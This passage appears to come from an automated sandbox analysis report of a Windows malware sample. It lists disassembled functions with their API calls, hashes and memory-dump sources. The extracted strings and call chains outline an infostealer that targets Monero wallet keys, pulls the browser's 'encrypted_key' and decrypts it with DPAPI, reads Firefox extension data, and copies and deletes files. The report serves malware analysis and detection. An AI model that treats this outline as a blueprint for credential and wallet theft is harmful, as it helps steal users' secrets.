                              • Instruction ID: 7991543ae8e4fc5efaa0568f477d3650df9b1b2cb9caa57687ac0e50668355e6
                              • Opcode Fuzzy Hash: c3f120e64358bdb5db9c54d0769fa54c40a35c271bd8669baa1418003fba49d8
                              • Instruction Fuzzy Hash: C4E1C372A10209DAEB16EBA4DD94EEE7338AF74200F508169E557B70D0EF346B4DCB61
                              Function 00FFD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                                • Part of subcall function 01008B60: GetSystemTime.KERNEL32(01010E1A,0198E8C8,010105AE,?,?,00FF13F9,?,0000001A,01010E1A,00000000,?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 01008B86
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FFD481
                              • lstrlen.KERNEL32(00000000), ref: 00FFD698
                              • lstrlen.KERNEL32(00000000), ref: 00FFD6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 00FFD72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: c4e40c005f717852c80c0b2c69e007b86b88cca21fc1d69cacb7abe766bf155d
                              • Instruction ID: b3b891fae34828d40ed32134ac691b2f92c6b24df706adbc7930845430ba4ff5
                              • Opcode Fuzzy Hash: c4e40c005f717852c80c0b2c69e007b86b88cca21fc1d69cacb7abe766bf155d
                              • Instruction Fuzzy Hash: 5B91E072A10209DBEB16FBA4DD94EEE7338AF74200F504169E597A70D0EF346B49CB61
                              Function 00FFD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                                • Part of subcall function 01008B60: GetSystemTime.KERNEL32(01010E1A,0198E8C8,010105AE,?,?,00FF13F9,?,0000001A,01010E1A,00000000,?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 01008B86
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FFD801
                              • lstrlen.KERNEL32(00000000), ref: 00FFD99F
                              • lstrlen.KERNEL32(00000000), ref: 00FFD9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 00FFDA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 4fb720379ccc98ba1f3f858da98b27c604bbbac8c01b5a41b642d127e045ccea
                              • Instruction ID: 531a1e06acdb563b5583b01dd58bfdb655c4265eb59e7caa8a36c9b6329b9223
                              • Opcode Fuzzy Hash: 4fb720379ccc98ba1f3f858da98b27c604bbbac8c01b5a41b642d127e045ccea
                              • Instruction Fuzzy Hash: 1A81F072A10209DBEB16FBA4DD94EEE7338BF64200F504129E587A70D4EF346B49DB61
                              Function 00FFF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                                • Part of subcall function 00FF99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FF99EC
                                • Part of subcall function 00FF99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FF9A11
                                • Part of subcall function 00FF99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FF9A31
                                • Part of subcall function 00FF99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FF148F,00000000), ref: 00FF9A5A
                                • Part of subcall function 00FF99C0: LocalFree.KERNEL32(00FF148F), ref: 00FF9A90
                                • Part of subcall function 00FF99C0: CloseHandle.KERNEL32(000000FF), ref: 00FF9A9A
                                • Part of subcall function 01008E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 01008E52
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,01011580,01010D92), ref: 00FFF54C
                              • lstrlen.KERNEL32(00000000), ref: 00FFF56B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              • Opcode ID: 41c3d39f0a185b4252460d5054c81abbf21ab409e1550c625790e865fec17980
                              • Instruction ID: 25a59d4613d301169a10105923ac51270169a210695b7c34f2f856eab942b233
                              • Opcode Fuzzy Hash: 41c3d39f0a185b4252460d5054c81abbf21ab409e1550c625790e865fec17980
                              • Instruction Fuzzy Hash: 4C51F075E10209EAEB05FBB4DC95EED7378AF64200F408528E556A71D4EF346B0DCBA1
                              Function 01003560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 15bccbe97bdf2c28297ce7342ef563e16cb5cd542b4dea134f329c1940763a55
                              • Instruction ID: d8fc8202320fe9319d2d36e3cdbdcf2277af6bfcdd49656d22e677c6ab3b1272
                              • Opcode Fuzzy Hash: 15bccbe97bdf2c28297ce7342ef563e16cb5cd542b4dea134f329c1940763a55
                              • Instruction Fuzzy Hash: F5416F71E10209DFEB06EFA4DC45AFEB774BB58304F008018E5966B284DB359645CFA1
                              Function 00FF9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 00FF99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FF99EC
                                • Part of subcall function 00FF99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FF9A11
                                • Part of subcall function 00FF99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FF9A31
                                • Part of subcall function 00FF99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FF148F,00000000), ref: 00FF9A5A
                                • Part of subcall function 00FF99C0: LocalFree.KERNEL32(00FF148F), ref: 00FF9A90
                                • Part of subcall function 00FF99C0: CloseHandle.KERNEL32(000000FF), ref: 00FF9A9A
                                • Part of subcall function 01008E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 01008E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00FF9D39
                                • Part of subcall function 00FF9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FF4EEE,00000000,00000000), ref: 00FF9AEF
                                • Part of subcall function 00FF9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00FF4EEE,00000000,?), ref: 00FF9B01
                                • Part of subcall function 00FF9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FF4EEE,00000000,00000000), ref: 00FF9B2A
                                • Part of subcall function 00FF9AC0: LocalFree.KERNEL32(?,?,?,?,00FF4EEE,00000000,?), ref: 00FF9B3F
                                • Part of subcall function 00FF9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00FF9B84
                                • Part of subcall function 00FF9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00FF9BA3
                                • Part of subcall function 00FF9B60: LocalFree.KERNEL32(?), ref: 00FF9BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: b26cfd580e210ecf08022aa605549c5c08097fb14efac1febd1fbeeec997b083
                              • Instruction ID: eb7ce74cc4c52ee99ae32e6251bb6996a64eba5dd5b08f359821925c3a05a1f2
                              • Opcode Fuzzy Hash: b26cfd580e210ecf08022aa605549c5c08097fb14efac1febd1fbeeec997b083
                              • Instruction Fuzzy Hash: 6D315CB6D0020DABCB14EBE4DC85FFEB7B8BF48304F244519EA45A7251E7749A14CBA1
                              Function 01008680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,010105B7), ref: 010086CA
                              • Process32First.KERNEL32(?,00000128), ref: 010086DE
                              • Process32Next.KERNEL32(?,00000128), ref: 010086F3
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                              • CloseHandle.KERNEL32(?), ref: 01008761
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: d4371923d3d9b997049f2b3c4f5747b2c7c90b185a2721f3edfcbaa999cb4d60
                              • Instruction ID: c707403f209ea32126a03aa1c6325e5dc32c2796b0eceb1d3119e80b52cfb802
                              • Opcode Fuzzy Hash: d4371923d3d9b997049f2b3c4f5747b2c7c90b185a2721f3edfcbaa999cb4d60
                              • Instruction Fuzzy Hash: B1316B71A01219EBEB26DF95DC84FEEB778FB54700F0081A9E14AA7190DB306B45CFA0
                              Function 01007980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,01010E00,00000000,?), ref: 010079B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 010079B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,01010E00,00000000,?), ref: 010079C4
                              • wsprintfA.USER32 ref: 010079F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 524a9fa0dad4b3d5dbbed9a8fd06e651f1b552d8d05754b3d34c2bb556739394
                              • Instruction ID: 33cbd85b187c4efc99cbe320d2d257c099df3f2d28bbefd6f50551f863ecc254
                              • Opcode Fuzzy Hash: 524a9fa0dad4b3d5dbbed9a8fd06e651f1b552d8d05754b3d34c2bb556739394
                              • Instruction Fuzzy Hash: 6B113CB2904518ABCB14DFC9E949BBEB7F8FB4CB11F00421AF645A2284D3395940CBB0
                              Function 010092E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(01003AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,01003AEE,?), ref: 010092FC
                              • GetFileSizeEx.KERNEL32(000000FF,01003AEE), ref: 01009319
                              • CloseHandle.KERNEL32(000000FF), ref: 01009327
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: 5479ff530256312b4ac89c3ae22a9eca054d6414c64a44944d72bbacbca4305c
                              • Instruction ID: b90f0138003739fec08c8520f451bae443db6a391afb8bd3d02de9c21a36cd57
                              • Opcode Fuzzy Hash: 5479ff530256312b4ac89c3ae22a9eca054d6414c64a44944d72bbacbca4305c
                              • Instruction Fuzzy Hash: 21F04F35E44208BBEB25DFB4EC49F9E77F9AB48710F10C2A4B695E72C5D670A6018F40
                              Function 0100C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __getptd.LIBCMT ref: 0100C74E
                                • Part of subcall function 0100BF9F: __amsg_exit.LIBCMT ref: 0100BFAF
                              • __getptd.LIBCMT ref: 0100C765
                              • __amsg_exit.LIBCMT ref: 0100C773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0100C797
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
